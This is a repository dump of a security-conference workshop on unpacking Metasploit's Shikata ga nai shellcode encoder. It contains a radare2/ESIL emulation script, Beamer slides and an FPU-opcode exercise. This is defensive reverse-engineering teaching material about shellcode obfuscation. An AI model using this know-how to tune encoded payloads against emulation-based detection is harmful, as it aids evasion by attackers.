106 | -------------------------------------------------------------------------------- /shikata_ga_nai/execve.shellcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/execve.shellcode -------------------------------------------------------------------------------- /shikata_ga_nai/hello.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import r2pipe 3 | 4 | r2 = r2pipe.open(sys.argv[1]) 5 | print('The five first instructions:\n%s\n' % r2.cmd('pi 5')) 6 | print('And now in JSON:\n%s\n' % r2.cmdj('pij 5')) 7 | print('architecture: %s' % r2.cmdj('ij')['bin']['machine']) 8 | 9 | 10 | -------------------------------------------------------------------------------- /shikata_ga_nai/pix/description.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/description.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/esil.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/esil.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/fpu.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/shikata_ga_nai/pix/fpu.png -------------------------------------------------------------------------------- /shikata_ga_nai/pix/fpus.png: -------------------------------------------------------------------------------- 
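import sys
import r2pipe


def initESIL():
    """Initialise the ESIL VM of the module-level ``r`` handle for a 32-bit x86 sample.

    Writes are redirected to the io cache so the sample on disk is never
    modified, a 0x2000-byte region named ``stack`` is mapped at 0xffffd000,
    all registers are reset and esp/ebp are pointed at the base of that
    mapping.
    """
    r.cmd('e io.cache=true')
    r.cmd('e asm.bits=32')
    r.cmd('aei')
    r.cmd('aeim 0xffffd000 0x2000 stack')
    r.cmd('.ar*')  # set all registers to zero
    r.cmd('aer esp=0xffffd000')
    r.cmd('aer ebp=0xffffd000')


def dump(start):
    """Print the disassembly from *start* to the end of the opened object and save those bytes.

    Uses the module-level ``r`` handle. The raw bytes are written to a file
    named ``out`` in the current directory (overwritten if present).

    Fix: the original joined ``chr(b)`` values into a str and wrote them to a
    text-mode file; on Python 3 every value >= 0x80 is then UTF-8 encoded,
    which corrupts the dump. The bytes are now written verbatim in binary
    mode (``bytearray(list_of_ints)`` works on both Python 2 and 3).
    """
    end = r.cmdj('oj')[0]['size']  # size of the opened object
    length = end - start

    print(r.cmd('pD %d @ %d' % (length, start)))  # disassembly

    raw = r.cmdj('p8j %d @ %d' % (length, start))  # byte values as ints
    with open('out', 'wb') as f:
        f.write(bytearray(raw))


def decode(r):
    """Single-step the sample in ESIL until the decoder has finished, then dump the result.

    Parameters
    ----------
    r : r2pipe handle on the sample, with eip at the first instruction
        (``initESIL`` must have been called before).

    The loop stops when the instruction at eip has type ``invalid``
    (end of the shellcode) and calls ``dump`` with the address just after
    the last ``loop`` instruction whose ecx had reached 1 or below, i.e.
    the point where the decoder loop exited. Gives up after 100000
    emulated instructions.
    """
    lastfpu = 0
    lastloop = 0

    for i in range(100000):
        current_op = r.cmdj('pdj 1 @ eip')[0]

        # End of shellcode or invalid opcode
        if current_op['type'] == 'invalid':
            dump(lastloop)
            return

        # ESIL doesn't implement FPU (yet), but we don't care, since FPU
        # instructions are only used to get EIP with the FNSTENV technique
        # (http://gynvael.coldwind.pl/n/eip_from_fpu_x86).
        #
        # So we take note of the offset of the latest FPU instruction and
        # write it to the memory at `esp` when `fnstenv` is encountered.
        if current_op['family'] == 'fpu':
            if current_op['opcode'].startswith('fnstenv'):
                r.cmd('wv %d @ esp' % lastfpu)
            else:
                lastfpu = current_op['offset']

        # Check for end of loop opcodes: when ecx is about to run out the
        # `loop` falls through and the decoded payload follows.
        if current_op['opcode'].startswith('loop') and r.cmdj('arj')['ecx'] <= 1:
            lastloop = current_op['offset'] + current_op['size']

        r.cmd('aes')

    # i is the last loop index, so i + 1 instructions were actually stepped
    print('[-] We emulated %d instructions, giving up' % (i + 1))


if len(sys.argv) != 2:
    print('[*] Usage: %s sample' % sys.argv[0])
    sys.exit(0)

r = r2pipe.open(sys.argv[1])
r.cmd('e asm.comments=false')
r.cmd('e asm.lines=false')
r.cmd('e asm.flags=false')
initESIL()
decode(r)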
\begin{document} 16 | 17 | \maketitle 18 | 19 | \begin{frame}{Disclaimer} 20 | \begin{center} 21 | This workshop is based on ideas and scripts from\\ 22 | Jaime (\alert{@NighetMan}) Peñalba. 23 | \end{center} 24 | \end{frame} 25 | 26 | \begin{frame}{Where to find the material?} 27 | \begin{center} 28 | Please look at the \alert{shikata\_ga\_nai} folder in the virtual machine 29 | \end{center} 30 | \end{frame} 31 | 32 | \section{What are we going to do?} 33 | 34 | \begin{frame}{Shikata ga nai} 35 | \begin{center} 36 | Unpack \alert{Shikata ga nai}! 37 | \end{center} 38 | \includegraphics[width=\textwidth]{description.png} 39 | \end{frame} 40 | 41 | \begin{frame}{Shikata ga nai} 42 | \begin{itemize} 43 | \item Polymorphic 44 | \item 320 lines of msf-powered OOP Ruby 45 | \item We want the unpacked shellcode 46 | \end{itemize} 47 | \end{frame} 48 | 49 | \section{How do we do it?} 50 | 51 | \begin{frame}{Solutions} 52 | \begin{itemize}[<+->] 53 | \item Run it on your machine and see what happens 54 | \item Step-step-step-step-step-… in gdb 55 | \item Trace the execution in a virtual machine 56 | \item Use radare2 with \alert{ESIL}! 
57 | \end{itemize} 58 | \end{frame} 59 | 60 | \section{But what is ESIL?} 61 | 62 | \begin{frame}{ESIL} 63 | \begin{itemize} 64 | \item Evaluable String Intermediary Language 65 | \item Yet another intermediary language 66 | \item RPN-ish 67 | \item \alert{$jz\;0xaabbccdd$} : $zf,?{,0xaabbccdd,eip,=,}$ 68 | \end{itemize} 69 | \end{frame} 70 | 71 | \section{What can we do with this \emph{ESIL}?} 72 | 73 | \begin{frame}{ESIL} 74 | \begin{columns} 75 | \begin{column}{.4\textwidth} 76 | \begin{itemize} 77 | \item Used for 78 | \begin{itemize}[<+->] 79 | \item Emulation 80 | \item Decompilation 81 | \item Analysis 82 | \item Flamewars against other IL 83 | \end{itemize} 84 | \end{itemize} 85 | \end{column} 86 | \begin{column}{.6\textwidth} 87 | \includegraphics[width=\textwidth]{esil.png} 88 | \end{column} 89 | \end{columns} 90 | \end{frame} 91 | 92 | \section{How does emulation help us to dump the shellcode?} 93 | 94 | \begin{frame}{Where to stop?} 95 | We can emulate the shellcode, but \alert{where} do we stop? 96 | \begin{itemize} 97 | \item Instructions aren't fixed. 98 | \item Blocks are permuted. 99 | \item Registers are dynamically selected. 100 | \end{itemize} 101 | \begin{center} 102 | So what can we do? 103 | \end{center} 104 | \end{frame} 105 | 106 | \begin{frame}{Reading the source code} 107 | It seems that the last instruction will always be \alert{loop}. 108 | \newline 109 | \newline 110 | \pause 111 | So we can emulate the shellcode, and dump the result from the last \alert{loop} instruction 112 | till the end.
113 | \end{frame} 114 | 115 | \section{How do we use radare2/ESIL anyway?} 116 | 117 | \begin{frame}{r2pipe} 118 | \includegraphics[width=\textwidth]{r2pipe.png} 119 | \end{frame} 120 | 121 | \begin{frame}{Languages} 122 | \begin{block}{NodeJS} 123 | npm install r2pipe 124 | \end{block} 125 | \begin{block}{Python} 126 | pip install r2pipe 127 | \end{block} 128 | \begin{block}{Ruby} 129 | gem install r2pipe 130 | \end{block} 131 | \end{frame} 132 | 133 | \section{So let's use ESIL?} 134 | 135 | \begin{frame}{Plot twist} 136 | \only<1>{ 137 | \begin{itemize} 138 | \item FPU is currently not supported in ESIL :D 139 | \item FPU is used to get EIP with \alert{FNSTENV} 140 | \item Polymorphic FPU instructions 141 | \end{itemize} 142 | } 143 | \only<2>{ 144 | \includegraphics[width=\textwidth]{fpu.png} 145 | } 146 | \end{frame} 147 | 148 | \section{Can we emulate them the \emph{ghetto way}?} 149 | 150 | \begin{frame}{Are those detected as FPU by r2?} 151 | \begin{itemize} 152 | \item You've got the \alert{hello\_world.py} code 153 | \item Check if every opcode in the \alert{test\_fpu.py} one has the \alert{fpu} family 154 | \item Feel free to do it in your favourite language! 155 | \end{itemize} 156 | \end{frame} 157 | 158 | \begin{frame}{My solution} 159 | \includegraphics[width=\textwidth]{fpus.png} 160 | \end{frame} 161 | 162 | \section{Ready to unpack shikata ga nai?} 163 | 164 | \begin{frame}{Sum up} 165 | \begin{enumerate} 166 | \item Initialize the ESIL vm 167 | \item If the instruction is \alert{invalid} 168 | \begin{enumerate} 169 | \item We're at the end! 
170 | \item Dump from the last encountered \alert{loop} instruction to the end 171 | \end{enumerate} 172 | \item Else, if the instruction is an fpu one 173 | \begin{enumerate} 174 | \item If it's \alert{fnstenv}, write the previously stored \alert{eip} at \alert{esp} 175 | \item Else, store \alert{eip} 176 | \end{enumerate} 177 | \item Else, if the instruction is \alert{loop}, store its location 178 | \item Step and goto \emph{2}. 179 | \end{enumerate} 180 | \end{frame} 181 | 182 | \section{Your turn!} 183 | 184 | \begin{frame}{My solution} 185 | \includegraphics[width=\textwidth]{solution.png} 186 | \end{frame} 187 | 188 | \section*{Conclusion} 189 | \begin{frame}{Conclusion} 190 | \begin{center} 191 | \only<1>{ 192 | \begin{itemize} 193 | \item ESIL is cool 194 | \item Still WIP 195 | \item More to come! 196 | \end{itemize} 197 | } 198 | \only<2>{ 199 | \Large 200 | Radare2 is \alert{nice}. 201 | 202 | You should use it. 203 | } 204 | \end{center} 205 | \end{frame} 206 | 207 | \begin{frame}{Resources} 208 | \begin{itemize} 209 | \item \href{https://github.com/radare/radare2}{Github repo} 210 | \item \href{http://rada.re}{Official website} 211 | \item \href{http://radare.today}{The r2 blog} 212 | \item \href{http://maijin.github.io/radare2book/}{The r2 book} 213 | \item \href{https://twitter.com/radareorg}{Twitter} 214 | \end{itemize} 215 | \end{frame} 216 | 217 | \end{document} 218 | -------------------------------------------------------------------------------- /shikata_ga_nai/test_fpu.py: -------------------------------------------------------------------------------- 1 | import r2pipe 2 | import sys 3 | 4 | opcodes = [ 5 | 'd9d0', 'd9e1', 'd9f6', 'd9f7', 'd9e5', 'd9e8', 'd9e9', 'd9ea', 'd9eb', 'd9ec', 6 | 'd9ed', 'd9c0', 'd9c1', 'd9c2', 'd9c3', 'd9c4', 'd9c5', 'd9c6', 'd9c7', 'd9c8', 7 | 'd9c9', 'd9ca', 'd9cb', 'd9cc', 'd9cd', 'd9ce', 'dac0', 'dac1', 'dac2', 'dac3', 8 | 'dac4', 'dac5', 'dac6', 'dac7', 'dac8', 'dac9', 'daca', 'dacb', 'dacc', 'dacd', 9 | 
'dace', 'dacf', 'dad0', 'dad1', 'dad2', 'dad3', 'dad4', 'dad5', 'dad6', 'dad7', 10 | 'dad8', 'dad9', 'dada', 'dadb', 'dadc', 'dadd', 'dade', 'dbc0', 'dbc1', 'dbc2', 11 | 'dbc3', 'dbc4', 'dbc5', 'dbc6', 'dbc7', 'dbc8', 'dbc9', 'dbca', 'dbcb', 'dbcc', 12 | 'dbcd', 'dbce', 'dbcf', 'dbd0', 'dbd1', 'dbd2', 'dbd3', 'dbd4', 'dbd5', 'dbd6', 13 | 'dbd7', 'dbd8', 'dbd9', 'dbda', 'dbdb', 'dbdc', 'dbdd', 'dbde', 'ddc0', 'ddc1', 14 | 'ddc2', 'ddc3', 'ddc4', 'ddc5', 'ddc6' 15 | ] 16 | 17 | r = r2pipe.open('-') 18 | 19 | # Hint: `abj` is the command you're looking for 20 | # Hint2: you're checking the `family` of the opcode 21 | 22 | -------------------------------------------------------------------------------- /slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/slides.pdf --------------------------------------------------------------------------------